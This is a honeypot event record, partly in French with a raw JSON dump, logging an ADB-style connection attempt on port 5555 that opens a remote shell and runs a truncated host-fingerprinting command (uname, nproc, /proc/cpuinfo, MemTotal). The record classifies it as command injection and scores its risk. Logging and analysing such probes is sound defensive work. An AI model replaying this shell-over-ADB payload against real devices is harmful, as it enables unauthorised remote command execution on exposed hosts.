Méthode
—
Port
5555
Chemin / cible
—
Service
PERSONAL AGENT
Payload
CNXN������������M ������host::features=cmd,shell_v2OPENX�������+�����������shell:A=$(uname -m 2>/dev/null||echo unk);A=$(echo "$
Pourquoi cette classification : Type « cmd_injection » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 54
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
pat-0773
pat-0141
pat-0145
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 932100 cmd exec
CRS 932130
CRS 932200
CRS 932205
CRS 932206
STUN binding
Minecraft varint handshake
TFTP RRQ
User-Agent
—
Règles WAF
—
Payload (extrait)
CNXN������������M
������host::features=cmd,shell_v2OPENX�������+�����������shell:A=$(uname -m 2>/dev/null||echo unk);A=$(echo "$
Requête brute (extrait)
CNXN������������M ������host::features=cmd,shell_v2OPENX�������+�����������shell:A=$(uname -m 2>/dev/null||echo unk);A=$(echo "$A"|tr -d '[:space:]');C=$(nproc 2>/dev/null||grep -c ^processor /proc/cpuinfo 2>/dev/null||echo 1);K=$(grep MemTotal /proc/memin
Meta JSON brut
{
"protocol_emulated": true,
"emulator_response": "32323020686f6e6579706f7420706572736f6e616c5f6167656e7420726561647920706f72743d353535350d0a",
"emulator_response_len": 45,
"bytes_in": 4096,
"payload_entropy": 5.5454303216212955,
"port_category": "registered",
"org": "Google LLC",
"service": "personal-agent",
"app_proto": "personal-agent",
"asn": 396982,
"country": "US",
"dst_port": 5555,
"risk_waf": 8,
"risk_classification": 85,
"risk_behavior": 0,
"risk_geo": 40,
"risk_protocol": 22,
"risk_novelty": 15,
"risk_boost": 0,
"risk_granularity": 1,
"risk_breakdown": {
"waf": 8,
"classification": 85,
"behavior": 0,
"geo": 40,
"protocol": 22,
"novelty": 15
},
"risk_score": 54,
"tag_count": 0,
"anomaly_count": 0,
"campaign_key": "888a6b39853f357075a34073a4e945bdda29b414",
"event_fingerprint": "d93c6d08fd760998a271a8a23a13788b18b2adca",
"classification_reason": "Type \u00ab cmd_injection \u00bb (signaux protocolaires) \u00b7 confiance 100%",
"confidence": 1,
"classification_confidence": 1,
"precision_score": 432,
"precision_signals": [
"MITRE-T1059",
"pat-0773",
"pat-0141",
"pat-0145",
"pat-0146",
"pat-0147"
],
"kb_rule_ids": [
"MITRE-T1059",
"pat-0773",
"pat-0141",
"pat-0145",
"pat-0146",
"pat-0147"
],
"matched_patterns": [
"pat-0773",
"pat-0141",
"pat-0145",
"pat-0146",
"pat-0147",
"pat-0771",
"pat-0554",
"pat-0536"
],
"matched_pattern_names": [
"CRS 932100 cmd exec",
"CRS 932130",
"CRS 932200",
"CRS 932205",
"CRS 932206",
"STUN binding",
"Minecraft varint handshake",
"TFTP RRQ"
],
"pattern_ids": [
"pat-0773",
"pat-0141",
"pat-0145",
"pat-0146",
"pat-0147",
"pat-0771",
"pat-0554",
"pat-0536"
],
"confidence_breakdown": {
"waf": 8,
"classification": 85,
"behavior": 0,
"geo": 40,
"protocol": 22,
"novelty": 15,
"risk_score": 54
},
"named_classification_skipped": false,
"service_name": "personal-agent",
"risk_confidence_factor": 100,
"city": null,
"is_datacenter": true,
"is_tor_hint": false,
"geo": {
"country": "US",
"asn": 396982,
"org": "Google LLC",
"is_datacenter": true,
"is_tor_hint": false
},
"fingerprint": {
"payload_hash": "5d6a8b76e0f3b7c74e5c4cb89af5c1d1",
"path_pattern_hash": "e27829ef3cf3e010f3932a3317a945f0"
},
"target_context": {
"dst_port": 5555,
"service": "personal-agent",
"service_name": "personal-agent",
"risk_score": 54
},
"payload_preview": "CNXN\u0000\u0000\u0000\u0001\u0000\u0000\u0004\u0000\u001b\u0000\u0000\u0000M\n\u0000\u0000\ufffd\ufffd\ufffd\ufffdhost::features=cmd,shell_v2OPENX\u0001\u0000\u0000\u0000\u0000\u0000\u0000+\u0012\u0000\u0000\u0018\ufffd\u0005\u0000\ufffd\ufffd\ufffd\ufffdshell:A=$(uname -m 2>\/dev\/null||echo unk);A=$(echo \"$",
"request_sample": "CNXN\u0000\u0000\u0000\u0001\u0000\u0000\u0004\u0000\u001b\u0000\u0000\u0000M\n\u0000\u0000\ufffd\ufffd\ufffd\ufffdhost::features=cmd,shell_v2OPENX\u0001\u0000\u0000\u0000\u0000\u0000\u0000+\u0012\u0000\u0000\u0018\ufffd\u0005\u0000\ufffd\ufffd\ufffd\ufffdshell:A=$(uname -m 2>\/dev\/null||echo unk);A=$(echo \"$A\"|tr -d '[:space:]');C=$(nproc 2>\/dev\/null||grep -c ^processor \/proc\/cpuinfo 2>\/dev\/null||echo 1);K=$(grep MemTotal \/proc\/memin",
"payload_snippet": "CNXN\u0000\u0000\u0000\u0001\u0000\u0000\u0004\u0000\u001b\u0000\u0000\u0000M\n\u0000\u0000\ufffd\ufffd\ufffd\ufffdhost::features=cmd,shell_v2OPENX\u0001\u0000\u0000\u0000\u0000\u0000\u0000+\u0012\u0000\u0000\u0018\ufffd\u0005\u0000\ufffd\ufffd\ufffd\ufffdshell:A=$(uname -m 2>\/dev\/null||echo unk);A=$(echo \"$",
"evidence": {
"request_sample": "CNXN\u0000\u0000\u0000\u0001\u0000\u0000\u0004\u0000\u001b\u0000\u0000\u0000M\n\u0000\u0000\ufffd\ufffd\ufffd\ufffdhost::features=cmd,shell_v2OPENX\u0001\u0000\u0000\u0000\u0000\u0000\u0000+\u0012\u0000\u0000\u0018\ufffd\u0005\u0000\ufffd\ufffd\ufffd\ufffdshell:A=$(uname -m 2>\/dev\/null||echo unk);A=$(echo \"$A\"|tr -d '[:space:]');C=$(nproc 2>\/dev\/null||grep -c ^processor \/proc\/cpuinfo 2>\/dev\/null||echo 1);K=$(grep MemTotal \/proc\/memin",
"payload_snippet": "CNXN\u0000\u0000\u0000\u0001\u0000\u0000\u0004\u0000\u001b\u0000\u0000\u0000M\n\u0000\u0000\ufffd\ufffd\ufffd\ufffdhost::features=cmd,shell_v2OPENX\u0001\u0000\u0000\u0000\u0000\u0000\u0000+\u0012\u0000\u0000\u0018\ufffd\u0005\u0000\ufffd\ufffd\ufffd\ufffdshell:A=$(uname -m 2>\/dev\/null||echo unk);A=$(echo \"$",
"classification_reason": "Type \u00ab cmd_injection \u00bb (signaux protocolaires) \u00b7 confiance 100%"
},
"attack_stage": "exploit_attempt",
"mitre_tactics": [
"TA0001",
"TA0002"
],
"mitre_techniques": [
"T1059",
"T1190"
],
"mitre": "T1059",
"threat_family": [
"rce_probe"
],
"recommended_client_action": "investigate",
"policy_mode": "intelligence",
"sensor_role": "threat_intelligence",
"event_signature": "053d5a878a82adaa20db54711ec1b663f6d1bb97",
"protocol_details": {
"payload_preview": "CNXN\u0000\u0000\u0000\u0001\u0000\u0000\u0004\u0000\u001b\u0000\u0000\u0000M\n\u0000\u0000\ufffd\ufffd\ufffd\ufffdhost::features=cmd,shell_v2OPENX\u0001\u0000\u0000\u0000\u0000\u0000\u0000+\u0012\u0000\u0000\u0018\ufffd\u0005\u0000\ufffd\ufffd\ufffd\ufffdshell:A=$(uname -m 2>\/dev\/null||echo unk);A=$(echo \"$",
"port": 5555,
"service": "personal-agent",
"service_label_fr": "PERSONAL AGENT"
},
"evidence_snippet": "CNXNM\n\ufffd\ufffd\ufffd\ufffdhost::features=cmd,shell_v2OPENX+\ufffd\ufffd\ufffd\ufffd\ufffdshell:A=$(uname -m 2>\/dev\/null||echo unk);A=$(echo \"$",
"attack_vector": "cmd injection \u00b7 via PERSONAL AGENT:5555 \u00b7 (tentative d'exploit)",
"target_port_label": "5555 \u00b7 PERSONAL AGENT",
"emulator_service": "personal-agent",
"confidence_reason": "Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9",
"site_display": {
"classification": null,
"classification_reason": "Type \u00ab cmd_injection \u00bb (signaux protocolaires) \u00b7 confiance 100%",
"classification_reason_label_fr": "Type \u00ab cmd_injection \u00bb (signaux protocolaires) \u00b7 confiance 100%",
"executive_one_liner_fr": "Activit\u00e9 suspecte \u2014 risque 54\/100 (Moyen) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via PERSONAL AGENT",
"confidence_pct": 100,
"confidence_breakdown": {
"waf": 8,
"classification": 85,
"behavior": 0,
"geo": 40,
"protocol": 22,
"novelty": 15,
"risk_score": 54
},
"attack_stage": "exploit_attempt",
"attack_stage_label": "Tentative d'exploit",
"attack_chain_stage": "exploitation",
"attack_chain_stage_label_fr": "Exploitation",
"risk_score": 54,
"risk_label": "Moyen",
"service_name": "personal-agent",
"service_label_fr": "PERSONAL AGENT",
"dst_port": 5555,
"protocol_emulated": true,
"tags_summary": [
"MITRE-T1059",
"pat-0773",
"pat-0141",
"pat-0145"
],
"tags_summary_labels_fr": [
"MITRE-T1059",
"pat-0773",
"pat-0141",
"pat-0145"
],
"recommended_action": "investigate",
"recommended_action_label": "Investiguer",
"mitre": "T1059",
"mitre_technique": "T1059",
"persona_hostname": "mail.sensor-1.internal",
"persona_service_banner": "honeypot-personal-agent",
"correlation_flags": null,
"correlation_flags_labels_fr": null,
"sensor_role": "threat_intelligence",
"sensor_role_label_fr": "Renseignement menaces",
"confidence_hint_fr": null,
"protocol_details": {
"payload_preview": "CNXN\u0000\u0000\u0000\u0001\u0000\u0000\u0004\u0000\u001b\u0000\u0000\u0000M\n\u0000\u0000\ufffd\ufffd\ufffd\ufffdhost::features=cmd,shell_v2OPENX\u0001\u0000\u0000\u0000\u0000\u0000\u0000+\u0012\u0000\u0000\u0018\ufffd\u0005\u0000\ufffd\ufffd\ufffd\ufffdshell:A=$(uname -m 2>\/dev\/null||echo unk);A=$(echo \"$",
"port": 5555,
"service": "personal-agent",
"service_label_fr": "PERSONAL AGENT"
},
"attack_vector": "cmd injection \u00b7 via PERSONAL AGENT:5555 \u00b7 (tentative d'exploit)",
"evidence_snippet": "CNXNM\n\ufffd\ufffd\ufffd\ufffdhost::features=cmd,shell_v2OPENX+\ufffd\ufffd\ufffd\ufffd\ufffdshell:A=$(uname -m 2>\/dev\/null||echo unk);A=$(echo \"$",
"target_port_label": "5555 \u00b7 PERSONAL AGENT",
"emulator_service": "personal-agent",
"confidence_reason": "Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9",
"confidence_factors_fr": "Confiance 100 % \u2014 Score WAF 8",
"campaign_hint_fr": null,
"attack_phases_timeline_fr": [
{
"key": "recon",
"label_fr": "Reconnaissance",
"active": false,
"kind": "stage"
},
{
"key": "probe",
"label_fr": "Sonde \/ probe",
"active": false,
"kind": "stage"
},
{
"key": "exploit_attempt",
"label_fr": "Tentative d'exploit",
"active": true,
"kind": "stage"
},
{
"key": "post_exploit",
"label_fr": "Post-exploitation",
"active": false,
"kind": "stage"
},
{
"key": "c2",
"label_fr": "Commande & contr\u00f4le",
"active": false,
"kind": "stage"
},
{
"key": "exploitation",
"label_fr": "Exploitation",
"active": true,
"kind": "chain",
"hint_fr": null
}
]
},
"honeypot_persona": {
"sensor_id": "sensor-1",
"hostname": "mail.sensor-1.internal",
"mail_host": "mail.sensor-1.internal",
"ldap_dc": "dc.sensor-1.internal",
"k8s_cluster": "hp-sensor-1",
"domain": "sensor-1.internal",
"service_role": "personal_agent",
"service_banner": "honeypot-personal-agent",
"service_os": "linux",
"dst_port": "5555"
},
"hostname": "mail.sensor-1.internal",
"sensor_id": "sensor-1",
"attack_chain_stage": "exploitation",
"ban_policy": "advisory_investigate",
"asn_dc_heuristic": true
}
|